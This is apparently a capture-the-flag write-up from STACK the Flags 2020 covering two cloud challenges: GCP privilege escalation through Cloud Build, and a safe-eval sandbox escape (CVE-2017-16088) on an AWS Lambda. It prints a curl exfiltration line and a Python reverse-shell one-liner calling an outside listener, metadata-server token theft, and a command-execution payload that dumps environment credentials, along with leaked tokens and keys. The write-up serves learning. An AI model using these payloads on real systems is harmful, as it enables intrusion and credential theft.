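At its core, the technique simply submits a Cloud Build job whose build step runs attacker-controlled code with the Cloud Build service account’s credentials. A stripped-down sketch of that idea (not the Rhino script itself; the project ID and access token are the ones obtained earlier, while the callback address is a placeholder):

# Minimal sketch of the cloudbuild.builds.create privilege escalation idea:
# submit a build whose single step executes our code as the Cloud Build
# service account. Placeholder values are marked below.
from google.oauth2.credentials import Credentials
from googleapiclient.discovery import build

ACCESS_TOKEN = "ya29...."                # covid-devops token from the metadata server
PROJECT_ID = "stack-the-flags-296309"
CALLBACK = "3.1.33.7:31337"              # placeholder listener, as in the example below

cloudbuild = build("cloudbuild", "v1", credentials=Credentials(ACCESS_TOKEN))

build_body = {
    "steps": [{
        "name": "python",
        "entrypoint": "python",
        # Inside the build container, the Cloud Build service account's
        # credentials are reachable via the metadata server.
        "args": ["-c", f'import os; os.system("curl {CALLBACK}")'],
    }],
    "timeout": "600s",
}

op = cloudbuild.projects().builds().create(projectId=PROJECT_ID, body=build_body).execute()
print(op["metadata"]["build"]["id"], op["metadata"]["build"]["status"])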

Then, grab the exploit script and run it.
In this example, the listening host is 3.1.33.7 and the listening port is 31337:

$ git clone https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation
$ cd GCP-IAM-Privilege-Escalation/ExploitScripts/
$ python3 cloudbuild.builds.create.py -p stack-the-flags-296309 -i 3.1.33.7:31337
No credential file passed in, enter an access token to authenticate? (y/n) y
Enter an access token to use for authentication: ya29.c.Ko0B6AcqN41ISFTTWIiitNsHfjiOeeKUDpQfzuV8pA1Fo6PC1PkjRO_OkjQBXQFcGIAWY-4d03toeSJX9KU-Nwq1W9z31H8psU61-dADX3EzP447Pq5twnpsp144R3IKmriDOdGGtmFRj2IX8oOWacHwyT17lV9t8wne7xjHz_uKK7qSPcTUVo8dkZ4gcPnU
{
    "name": "operations/build/stack-the-flags-296309/YTkzZTZmYTMtOWFmOC00YWFjLTg4NTYtNzRlZjlkNGExZGQw",
    "metadata": {
        "@type": "type.googleapis.com/google.devtools.cloudbuild.v1.BuildOperationMetadata",
        "build": {
            "id": "a93e6fa3-9af8-4aac-8856-74ef9d4a1dd0",
            "status": "QUEUED",
            "createTime": "2020-12-10T07:15:13.788132684Z",
            "steps": [
                {
                    "name": "python",
                    "args": [
                        "-c",
                        "import os;os.system(\"curl -d @/root/tokencache/gsutil_token_cache 3.1.33.7:31337\")"
                    ],
                    "entrypoint": "python"
                }
            ],
            "timeout": "600s",
            "projectId": "stack-the-flags-296309",
            "logsBucket": "gs://605021491171.cloudbuild-logs.googleusercontent.com",
            "options": {
                "logging": "LEGACY"
            },
            "logUrl": "https://console.cloud.google.com/cloud-build/builds/a93e6fa3-9af8-4aac-8856-74ef9d4a1dd0?project=605021491171",
            "queueTtl": "3600s",
            "name": "projects/605021491171/locations/global/builds/a93e6fa3-9af8-4aac-8856-74ef9d4a1dd0"
        }
    }
}
Web server started at 0.0.0.0:31337.
Waiting for token at 3.1.33.7:31337...

$ 

Strange! The access token for the GCP Cloud Build service account is not returned to us!
Perhaps something went wrong. Let’s modify the script to get a reverse shell and investigate further:

Add this line (which builds the reverse shell command from the host/port passed via the -i argument) just before the build_body dict:

command = f'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{args.ip_port.split(":")[0]}",{args.ip_port.split(":")[1]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

And, replace these lines:

handler = socketserver.TCPServer(('', int(port)),myHandler)
print(f'Web server started at 0.0.0.0:{port}.')
print(f'Waiting for token at {ip}:{port}...\n')
handler.handle_request()

With these:

print(f'Waiting for reverse shell at {ip}:{port}...\n')
import os; os.system(f"nc -lnvp {port}")

Then, re-run the script:

$ sudo python3 cloudbuild.builds.create.py -p stack-the-flags-296309 -i 3.1.33.7:31337
No credential file passed in, enter an access token to authenticate? (y/n) y
Enter an access token to use for authentication: ya29.c.Ko0B6AcqN41ISFTTWIiitNsHfjiOeeKUDpQfzuV8pA1Fo6PC1PkjRO_OkjQBXQFcGIAWY-4d03toeSJX9KU-Nwq1W9z31H8psU61-dADX3EzP447Pq5twnpsp144R3IKmriDOdGGtmFRj2IX8oOWacHwyT17lV9t8wne7xjHz_uKK7qSPcTUVo8dkZ4gcPnU
{
    "name": "operations/build/stack-the-flags-296309/MTEzMjBmN2QtNjMzOS00OTMxLTk5NWMtM2ZiZWRkYTNmYWFl",
    "metadata": {
        "@type": "type.googleapis.com/google.devtools.cloudbuild.v1.BuildOperationMetadata",
        "build": {
            "id": "11320f7d-6339-4931-995c-3fbedda3faae",
            "status": "QUEUED",
            "createTime": "2020-12-10T07:15:14.173481293Z",
            "steps": [
                {
                    "name": "python",
                    "args": [
                        "-c",
                        "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"3.1.33.7\",31337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")"
                    ],
                    "entrypoint": "python"
                }
            ],
            "timeout": "600s",
            "projectId": "stack-the-flags-296309",
            "logsBucket": "gs://605021491171.cloudbuild-logs.googleusercontent.com",
            "options": {
                "logging": "LEGACY"
            },
            "logUrl": "https://console.cloud.google.com/cloud-build/builds/11320f7d-6339-4931-995c-3fbedda3faae?project=605021491171",
            "queueTtl": "3600s",
            "name": "projects/605021491171/locations/global/builds/11320f7d-6339-4931-995c-3fbedda3faae"
        }
    }
}
Waiting for reverse shell at 3.1.33.7:31337...

Listening on [0.0.0.0] (family 0, port 31337)
Connection from 34.73.245.117 52068 received!
root@aecc318d6dc4:/workspace#

Hooray! We get a root shell! But remember, our goal is not to achieve root on a Cloud Build container, so let’s continue on to get the access token for the Cloud Build service account.

root@aecc318d6dc4:/workspace# cat /root/tokencache/gsutil_token_cache
cat /root/tokencache/gsutil_token_cache
cat: /root/tokencache/gsutil_token_cache: No such file or directory

Oh no. The exploit script failed because the access token cached for use by gsutil is missing!

There are two ways to get the access token from this point on:

  1. Method 1: Query the Metadata Server directly
  2. Method 2: Install the Google Cloud SDK and make gcloud fetch the access token for you

Method 1: Via GCP Instance Metadata Server

root@79e8f1cff449:/workspace# curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/?recursive=true
{
    "605021491171@cloudbuild.gserviceaccount.com": {
        "aliases": ["default"],
        "email": "605021491171@cloudbuild.gserviceaccount.com",
        "scopes": ["https://www.googleapis.com/auth/cloud-platform", "https://www.googleapis.com/auth/cloud-source-tools", "https://www.googleapis.com/auth/userinfo.email"]
    },
    "default": {
        "aliases": ["default"],
        "email": "605021491171@cloudbuild.gserviceaccount.com",
        "scopes": ["https://www.googleapis.com/auth/cloud-platform", "https://www.googleapis.com/auth/cloud-source-tools", "https://www.googleapis.com/auth/userinfo.email"]
    }
}

root@79e8f1cff449:/workspace# curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
{"access_token":"ya29.c.KnLoB_NbLc_ULBLTouabVjmRoc69Z7N8OexLB1Fpwd3rDF4WM7iR1RoIaFLjrPN3G0NBe9jHN8meLZkhtCdZ5MgXfPbZfUryHxELrw-gIHhPNh_zx0M-atbN-krhKGvnfHvJpPCRrKP_QCL8Bvy3-tU5ahY","expires_in":3211,"token_type":"Bearer"}

Method 2: Via gcloud

Using the reverse shell, follow the installation steps for the Google Cloud SDK (which provides gcloud and gsutil) and then run the following command:

root@79e8f1cff449:/workspace# gcloud auth application-default print-access-token
ya29.c.KnLoB_NbLc_ULBLTouabVjmRoc69Z7N8OexLB1Fpwd3rDF4WM7iR1RoIaFLjrPN3G0NBe9jHN8meLZkhtCdZ5MgXfPbZfUryHxELrw-gIHhPNh_zx0M-atbN-krhKGvnfHvJpPCRrKP_QCL8Bvy3-tU5ahY

Getting the Final Flag From Bucket

Awesome! We managed to obtain the temporary access token for the default GCP Cloud Build service account!

Let’s test to see if the GCP Cloud Build service account has the storage.buckets.list permission:

$ curl "https://storage.googleapis.com/storage/v1/b/punggol-digital-lock-key/o?project=stack-the-flags-296309&access_token=ya29.c.KnLoB_NbLc_ULBLTouabVjmRoc69Z7N8OexLB1Fpwd3rDF4WM7iR1RoIaFLjrPN3G0NBe9jHN8meLZkhtCdZ5MgXfPbZfUryHxELrw-gIHhPNh_zx0M-atbN-krhKGvnfHvJpPCRrKP_QCL8Bvy3-tU5ahY"
{
  "kind": "storage#objects",
  "items": [
    {
      "kind": "storage#object",
      "id": "punggol-digital-lock-key/last_half.txt/1607586270019961",
      "selfLink": "https://www.googleapis.com/storage/v1/b/punggol-digital-lock-key/o/last_half.txt",
      "mediaLink": "https://storage.googleapis.com/download/storage/v1/b/punggol-digital-lock-key/o/last_half.txt?generation=1607586270019961&alt=media",
      "name": "last_half.txt",
      "bucket": "punggol-digital-lock-key",
      "generation": "1607586270019961",
      "metageneration": "1",
      "contentType": "text/plain",
      "storageClass": "STANDARD",
      "size": "17",
      "md5Hash": "WviwTGRF7YEzWXqehPCbHg==",
      "crc32c": "RtRJWw==",
      "etag": "CPmCyMT1wu0CEAE=",
      "timeCreated": "2020-12-10T07:44:30.019Z",
      "updated": "2020-12-10T07:44:30.019Z",
      "timeStorageClassUpdated": "2020-12-10T07:44:30.019Z"
    }
  ]
}

We finally see the second half of the flag stored as an object in the punggol-digital-lock-key bucket!
Does it also have the storage.objects.get permission?

$ curl "https://storage.googleapis.com/download/storage/v1/b/punggol-digital-lock-key/o/last_half.txt?generation=1607586270019961&alt=media&project=stack-the-flags-296309&access_token=ya29.c.KnLoB_NbLc_ULBLTouabVjmRoc69Z7N8OexLB1Fpwd3rDF4WM7iR1RoIaFLjrPN3G0NBe9jHN8meLZkhtCdZ5MgXfPbZfUryHxELrw-gIHhPNh_zx0M-atbN-krhKGvnfHvJpPCRrKP_QCL8Bvy3-tU5ahY"
4pPro4ch_Is_G00d}

Yes it does! And there we have it! Combining both pieces of the flag together, we get:

govtech-csg{Mult1_Cl0uD_4pPro4ch_Is_G00d}

Complete Attack Path

Here’s an overview of the complete attack path for this challenge: Overview of Attack Path

Thanks for reading my final write-up on the challenges from STACK the Flags 2020 CTF!

It was fun solving these cloud challenges and gaining a much better understanding of the various services offered by cloud vendors as well as knowing how to perform penetration testing on cloud computing environments.

Here’s a write-up on a cloud challenge titled Hold the Line! Perimeter Defences Doing It's Work! which I solved in STACK the Flags 2020 CTF organized by Government Technology Agency of Singapore (GovTech)’s Cyber Security Group (CSG). Unsurprisingly, there were quite a number of solves since the challenge is rather simple and fairly straightforward.

Those who have analysed the arbitrary JavaScript code injection vulnerability in Bassmaster v1.5.1 (CVE-2014-7205) as part of the Advanced Web Attacks and Exploitation (AWAE) course / Offensive Security Web Expert (OSWE) certification will definitely find the injection vector for this challenge somewhat familiar.

This challenge was written by Tan Kee Hock from GovTech’s CSG :)

Hold the Line! Perimeter Defences Doing It’s Work! Cloud Challenge

Description:
Apparently, the lead engineer left the company (“Safe Online Technologies”). He was a talented engineer and worked on many projects relating to Smart City. He goes by the handle c0v1d-agent-1. Everyone didn’t know what this meant until COViD struck us by surprise. We received a tip-off from his colleagues that he has been using vulnerable code segments in one of a project he was working on! Can you take a look at his latest work and determine the impact of his actions! Let us know if such an application can be exploited!

Tax Rebate Checker - http://lcyw7.tax-rebate-checker.cf/

Introduction

Let’s start by visiting the challenge site.

Tax Rebate Checker

Examining the client-side source code, we can see that the main JavaScript file loaded is http://lcyw7.tax-rebate-checker.cf/static/js/main.a6818a36.js, which appears to be webpack-ed. Luckily for us, the source mapping file is also available to us at http://lcyw7.tax-rebate-checker.cf/static/js/main.a6818a36.js.map.

You may have heard of Webpack Exploder by @spaceraccoonsec which helps to unpack the source code of the React Webpack-ed application, but are you aware that Google Chrome’s Developer Tools (Chrome DevTools) supports unpacking of Webpack-ed applications out of the box too?

Using Chrome DevTools, we can inspect the original unpacked source files by navigating to the Sources Tab in the top navigation bar, then click on the webpack:// pseudo-protocol in the left sidebar as such:

Analyse Webpack JavaScript Files Using Chrome DevTools

The source code for index.js is shown below:

import React from 'react';
import ReactDOM from 'react-dom';
import axios from 'axios';

class MyForm extends React.Component {
  constructor() {
    super();
    this.state = {
      loading : false,
      message : ''
    };
    this.onInputchange = this.onInputchange.bind(this);
    this.onSubmitForm = this.onSubmitForm.bind(this);
  }

  renderMessage() {
    return this.state.message;
  }

  renderLoading() {
    return 'Please wait...';
  }

  onInputchange(event) {
    this.setState({
      [event.target.name]: event.target.value
    });
  }

  onSubmitForm() {
    let context = this;
    this.setState({
      loading : true,
      message : "Loading..."
    })
    // any changes, please fix at this [https://github.com/c0v1d-agent-1/tax-rebate-checker]
    axios.post('https://cors-anywhere.herokuapp.com/https://nymcmhv6oa.execute-api.ap-southeast-1.amazonaws.com/prod/tax-rebate-checker', {
      age: btoa(this.state.age),
      salary: btoa(this.state.salary)
    })
    .then(function (response) {
      context.setState({
        loading : false,
        message : "You will get (SGD) $" + Math.ceil(response.data.results) + " off your taxes!"
      })
    })
    .catch(function (error) {
      console.log(error);
    });
  }

  render() {
    return (
      <div>
        
        <div>
          <label>
            Annual Salary : <input name="salary" type="number" value={this.state.salary} onChange={this.onInputchange}/>
          </label>
        </div>
        <div>
          <label>
            Age : <input name="age" type="number" value={this.state.age} onChange={this.onInputchange} />
          </label>
        </div>
        <div>
            <button onClick={this.onSubmitForm}>Submit</button>
        </div>
        <br></br>
        <p>{this.state.loading ? this.renderLoading() : this.renderMessage()}</p>
      </div>
    );
  }
}
ReactDOM.render(<MyForm />, document.getElementById('root'));

We can see that there is a comment pointing to a GitHub repository at https://github.com/c0v1d-agent-1/tax-rebate-checker.
Even if this comment was not provided, we would still be able to find the repository easily by:

  • Searching for c0v1d-agent-1 on GitHub
  • Searching for tax-rebate-checker on GitHub

Tax Rebate Checker GitHub Search

Back to the source code of the React application, we also see the following code:

axios.post('https://cors-anywhere.herokuapp.com/https://nymcmhv6oa.execute-api.ap-southeast-1.amazonaws.com/prod/tax-rebate-checker', {
    age: btoa(this.state.age),
    salary: btoa(this.state.salary)
})

We discover the use of the cors-anywhere proxy, a service which relays requests to the target URL and adds Cross-Origin Resource Sharing (CORS) headers to the response. In other words, the actual target URL is https://nymcmhv6oa.execute-api.ap-southeast-1.amazonaws.com/prod/tax-rebate-checker.

Examining the target URL carefully, we can observe that it is a REST API in Amazon API Gateway. Amazon API Gateway is also often used with AWS Lambda, which is something worth noting before we move on to explore what’s in the GitHub repository.

Analysing GitHub Repository

At https://github.com/c0v1d-agent-1/tax-rebate-checker, we see a Node.js application.
The default README mentions deployment to the AWS Lambda service, which is what we noted earlier.

Let’s look at the source code of the application. The source code of index.js is shown below:

'use strict';
var safeEval = require('safe-eval')
exports.handler = async (event) => {
    let responseBody = {
        results: "Error!"
    };
    let responseCode = 200;
    try {
        if (event.body) {
            let body = JSON.parse(event.body);
            // Secret Formula
            let context = {person: {code: 3.141592653589793238462}};
            let taxRebate = safeEval((new Buffer(body.age, 'base64')).toString('ascii') + " + " + (new Buffer(body.salary, 'base64')).toString('ascii') + " * person.code",context);
            responseBody = {
                    results: taxRebate
            };
        }
    } catch (err) {
        responseCode = 500;
    }
    let response = {
        statusCode: responseCode,
        headers: {
            "x-custom-header" : "tax-rebate-checker"
        },
        body: JSON.stringify(responseBody)
    };
    return response;
};

It looks like our input, supplied as a JSON object with Base64-encoded age and salary fields, is decoded and passed to safeEval().
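
To see what ends up inside safeEval(), consider a benign request. Assuming the decoded age is 35 and the decoded salary is 50000 (illustrative values only), the handler effectively evaluates the following expression:

var safeEval = require('safe-eval');

// The handler splices the decoded inputs into an arithmetic expression
// and evaluates it against a context that only exposes person.code:
var result = safeEval('35 + 50000 * person.code', { person: { code: 3.141592653589793238462 } });
console.log(result); // ~157114.63, i.e. 35 + 50000 * pi

Because the decoded strings are spliced directly into the expression, we fully control the code that safeEval() sees.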

The safe-eval package has had known vulnerabilities in the past, so let’s also check the package.json file to see which version of safe-eval is being used:

{
  "name": "pension-shecker-lambda",
  "version": "1.0.0",
  "description": "",
  "main": "index.js",
  "scripts": {
    "test": "echo \"Error: no test specified\" && exit 1"
  },
  "author": "",
  "license": "ISC",
  "dependencies": {
    "safe-eval": "^0.3.0"
  }
}

Indeed, the application uses safe-eval v0.3.0, which is a vulnerable version.

Crafting the Exploit Payload

Let’s examine the proof-of-concept exploit for CVE-2017-16088, which bypasses the safe-eval sandbox:

var safeEval = require('safe-eval');
safeEval("this.constructor.constructor('return process')().exit()");

This returns the process global object, which gives us control over the current Node.js process.
Even though safe-eval prevents use of require() directly inside the sandbox, we can bypass this restriction with process.mainModule.require(), since process.mainModule refers to require.main and exposes its require() method.
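
Putting the two pieces together, a local sketch of the sandbox escape might look like the following (assuming safe-eval v0.3.0 is installed; the command run here is id purely for illustration):

var safeEval = require('safe-eval');

// 1. Break out of the vm sandbox via the Function constructor to obtain `process`.
// 2. Use process.mainModule.require() to load child_process, since require()
//    itself is not available inside the sandbox.
var payload = "this.constructor.constructor('return process')()" +
    ".mainModule.require('child_process').execSync('id').toString()";

console.log(safeEval(payload));

Swapping id for env inside the Lambda environment would dump the function’s environment variables, which is exactly what we will do against the staging stage shortly.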

Now that we have a good idea of how to achieve remote code execution on the AWS Lambda function, let’s also take a closer look at the suspicious GitHub issue at https://github.com/c0v1d-agent-1/tax-rebate-checker/issues/1:

One of the libraries used by the function was vulnerable.
Resolved by attaching a WAF to the prod deployment.
WAF will not to be attached staging deployment there is no real impact.

Recall that the application at http://lcyw7.tax-rebate-checker.cf/ issues requests to https://cors-anywhere.herokuapp.com/https://nymcmhv6oa.execute-api.ap-southeast-1.amazonaws.com/prod/tax-rebate-checker, which effectively forwards incoming requests to https://nymcmhv6oa.execute-api.ap-southeast-1.amazonaws.com/prod/tax-rebate-checker – the prod stage!

If there’s a WAF on the prod stage, perhaps we can target the unprotected staging deployment first and only attempt to bypass the WAF if need be.

Before we can try to obtain remote code execution on the AWS Lambda function instance, we need to correctly format our input to the server.
As discussed previously, the Tax Rebate Checker application accepts a JSON input with both age and salary Base64-encoded.
Now, let’s use curl to run the AWS Lambda function on the staging deployment to try to obtain the environment variables set in the AWS Lambda function instance:

$ curl -X POST \
    -H 'Content-Type: application/json' \
    https://nymcmhv6oa.execute-api.ap-southeast-1.amazonaws.com/staging/tax-rebate-checker \
    --data '{"age":"'$(printf "this.constructor.constructor('return process')().mainModule.require('child_process').execSync('env').toString()" | base64 -w 0)'","salary":"'$(printf 1 | base64)'"}'
{"results":"AWS_LAMBDA_FUNCTION_VERSION=$LATEST\nflag=St4g1nG_EnV_I5_th3_W34k3$t_Link\nAWS_SESSION_TOKEN=IQoJb3JpZ2luX2VjENj//////////wEaDmFwLXNvdXRoZWFzdC0xIkYwRAIgDbiXQPR7pS/1Jlq8+CvWJEvBWEdzDgMZgmKXB6MbNzUCIFTQNbDFdxZ0qdOmTskWzFOeLpH12FinODzQ8XWo7CdNKtEBCHEQABoMNjQyOTk4NDY5NzM2IgzR7/iDouxfR0H3mQkqrgFHKpR/iXFoOCMF3wtocpFugLFNFVy+LMmgO6JFK56vSGq6zGwzepfYZTV7vLvRauJG9Y9e4o10bLznWugZt3RyH4cWvvHURygQsI5x8BRFMHtqNna7Q/lSWUJIancjx07sHZimJzdRO1SJu5PTu9wI2NFCW6uSKq6z/hHf0Ed8uCMAnkOtGHuY7jfoC2tWNPlByvrEW2mQzBFFgj2DTL/GdFSpS351lFD35am7nVQwibHH/gU64QHk9LffR6ZXw66N/7g5BRYhWGdKyz53O04vrFmttDusAhofGi8T74C1/3x096S1NtASZfVj3YmDwMYOQ1j4D6wEp8CUh5vc7FhQr9l9E8Zdvt78jqyx8l4Wto3UMirBgJDtfEqq5TbcaDP9FM9l1dInGC9Ch6YLJHIRl9Lwctj0s8pveOj0FTN29/PhpkHGWzl4SYSHKOAj/7h1k2J8Sx1JdtyDTKu+X6ACp1uxwDK2k2W2bnrCGVQ/3C2dTzoAINtX9RSk8DcBczXM75/cSi+3u+ClT3SMlBVzUmlPsm90G7U=\nAWS_LAMBDA_LOG_GROUP_NAME=/aws/lambda/tax-rebate-checker\nLAMBDA_TASK_ROOT=/var/task\nLD_LIBRARY_PATH=/var/lang/lib:/lib64:/usr/lib64:/var/runtime:/var/runtime/lib:/var/task:/var/task/lib:/opt/lib\nAWS_LAMBDA_RUNTIME_API=127.0.0.1:9001\nAWS_LAMBDA_LOG_STREAM_NAME=2020/12/10/[$LATEST]36472aa2e8e049cfad80aec03f1cae7f\nAWS_EXECUTION_ENV=AWS_Lambda_nodejs12.x\nAWS_XRAY_DAEMON_ADDRESS=169.254.79.2:2000\nAWS_LAMBDA_FUNCTION_NAME=tax-rebate-checker\nPATH=/var/lang/bin:/usr/local/bin:/usr/bin/:/bin:/opt/bin\nAWS_DEFAULT_REGION=ap-southeast-1\nPWD=/var/task\nAWS_SECRET_ACCESS_KEY=drKOGJQgV4HeWciBrP9CgYyAoJrdoFtTHwg0X//f\nLANG=en_US.UTF-8\nLAMBDA_RUNTIME_DIR=/var/runtime\nAWS_LAMBDA_INITIALIZATION_TYPE=on-demand\nAWS_REGION=ap-southeast-1\nTZ=:UTC\nNODE_PATH=/opt/nodejs/node12/node_modules:/opt/nodejs/node_modules:/var/runtime/node_modules:/var/runtime:/var/task\nAWS_ACCESS_KEY_ID=ASIAZLNNSARUIMCNBHX3\nSHLVL=1\n_AWS_XRAY_DAEMON_ADDRESS=169.254.79.2\n_AWS_XRAY_DAEMON_PORT=2000\n_X_AMZN_TRACE_ID=Root=1-5fd1d8f0-7f0800a731b13cf00a3c8db7;Parent=4c8bd2bd54f1fb14;Sampled=0\nAWS_XRAY_CONTEXT_MISSING=LOG_ERROR\n_HANDLER=index.handler\nAWS_LAMBDA_FUNCTION_MEMORY_SIZE=128\n_=/usr/bin/env\n3.141592653589793"}

Note: The -w 0 argument for the base64 command is required to disable line-wrapping, which would otherwise introduce newlines into the encoded payload.

Awesome! We found the flag environment variable set to St4g1nG_EnV_I5_th3_W34k3$t_Link, and we can get the final flag by wrapping it in the flag format:

govtech-csg{St4g1nG_EnV_I5_th3_W34k3$t_Link}